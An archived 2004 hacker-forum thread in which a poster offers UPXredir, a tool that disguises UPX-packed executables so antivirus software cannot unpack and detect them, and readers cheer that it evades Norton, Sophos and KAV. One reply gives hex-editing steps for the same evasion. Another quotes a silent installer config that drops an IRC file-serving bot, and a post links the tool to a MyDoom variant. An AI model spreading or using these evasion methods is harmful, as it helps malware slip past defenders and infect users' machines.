archphase
Jan 20 2004, 04:45 AM
UPXredirThis tool takes a packed UPX file and smacks on a section and does a few more things of trickery to transform it to not look like a UPX packed file so when anti-virii comes only they can't decompress the packed data and see it's raw form. Includes sourcecode and binary, written in Delphi 6.
Screenshot:
http://archphase.united.net.kg/upxredir.bmpI tested it on KAV online virii scan and seems to bypass measures there and seeing as KAV is the best in my mind i think it would follow that NAV/McAffe would miss it too, but feedback is appreciated.
get it @:
http://nuclearwinter.e-plutonia.com or
http://archphase.united.net.kg
Thom
Jan 20 2004, 07:42 AM
Thank you dude, great tool. I think I bypassed Norton AntiVirus with it
onlinepass
Jan 20 2004, 08:12 AM
Cool Dude...
I havent tried it yet...but its really great to get the idea to do it...
Onlinepass
BuzzDee
Jan 20 2004, 08:40 AM
hehe the tool worx perfectl!
i have sophos on my pc and norton on another and both avs couldnt find a virus after packing ^^
greetz
Double-=V=-
Jan 20 2004, 01:19 PM
Wow very nice. thanks.
UnDeRTaKeR
Jan 20 2004, 01:35 PM
Very Nice DuDe! 10x!
archphase
Jan 20 2004, 03:13 PM
Thxs guys makes my work all the more desirable, very trival method, I doubt they'll pick it up, if they do I'll come up w/ something new.
SkyRaVeR
Jan 20 2004, 04:00 PM
many th@nx dude

nice work !
net
Jan 20 2004, 06:36 PM
hehe worX great .. thanx mate
boshcash
Jan 20 2004, 07:07 PM
nice job .. when i try it i will tell u my opinion , this program would help me much !
GhostCow
Jan 20 2004, 10:04 PM
sweet archphase!
Alexander01
Jan 21 2004, 12:36 AM
ive packed my whole collection with it and a lot exe's doesn't work anymore.. but the ones that still work are undetectable for AV now so nice tool anyway
BeNiNuK
Jan 22 2004, 08:54 PM
hehe kewl
BLSP
Jan 22 2004, 11:16 PM
| QUOTE (BeNiNuK @ Jan 22 2004, 08:54 PM) |
| hehe kewl |
And wtf are u trying to do with that exe ....
Thom
Jan 22 2004, 11:21 PM
/me agrees with BLSP
vnet576
Jan 22 2004, 11:37 PM
Thats his xdcc bot in a rar sfx executable package...perhaps someone wants to decrypt his iroffer password (unix based use JTR) and bring down his botnet, and maybe next time he'll think before he posts things like this.
Thom
Jan 23 2004, 04:49 PM
haha no shit
Path=C:\winnt\system32\
SavePath
Setup=C:\winnt\system32\start.bat
Silent=1
Overwrite=1
server irc.rizon.net 6667
channel #PrO-WaReZ -plist 14
adminpass aqoOVCBv2fTGs
adminhost *@*
adminhost *@*
BeNiNuK
Jan 23 2004, 04:54 PM
it aint a botnet its a rootkit script u just send it to a bot and exec it put it in the wrong downloads thingi though was supposed to put it in the jab rootkit 1
Thom
Jan 23 2004, 05:30 PM
Calm down BeNiNuK, pls dont come harras me on IRC networks, dont make such a big deal of it.
nulladd
Jan 23 2004, 05:31 PM
nice one BeNiNuK, not detectable by AV either (22nd jan defintions)
can u give more info on this, what sort of functions does it have, etc
Thom
Jan 23 2004, 10:04 PM
its a xdcc bot(www.iroffer.org) its used for making computers send out files over IRC.
nulladd
Jan 24 2004, 09:37 AM
thanks thom, although ive heard of iroffer before i was just a bit confused when BeNiNuK said it wasnt a botnet
eXtErNaL
Jan 25 2004, 09:46 AM
jead99
Jan 26 2004, 10:08 AM
Wow, works very well, thanks alot for sharing
r3L4x
Jan 31 2004, 07:03 AM
| QUOTE (Alexander01 @ Jan 21 2004, 12:36 AM) |
| ive packed my whole collection with it and a lot exe's doesn't work anymore.. but the ones that still work are undetectable for AV now so nice tool anyway |
wicked
Jan 31 2004, 07:11 AM
it aint hard to use a basic method which I explained in detail a while ago now...
BTW this method should work with jst about any compactor....
[1] Get a Hex Editor like
psedit or
Ultra-edit[2] Open compressed File.
[3] search for String "UPX" or "upx"
[4] replace with "EHH" or whatever.
[5] try opening it with
compactor[6]
Error filetype Unrecognised....
Simple.
Wkd...
I think that you could create a simple ASM proggy to Achieve the above Mentioned Tactic... but it would be nice to be able to also
Reverse it if you wanted to in the future also...
Wkd...
clubfed
Jan 31 2004, 12:40 PM
archphase
Jan 31 2004, 06:51 PM
Oh yeh i forgot to post all around about UPXcrypt. It seems KAV have already detected the tool and again aren't give me credits :'(. Anyways UPXcrypt adds an actual encryption/decryption engine, won't chop EOF data (r3l4x :-p). Seems some anti-virii companies had to pick it up and look at UPXredir as the .B variant of MyDoom was messed with it heh.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.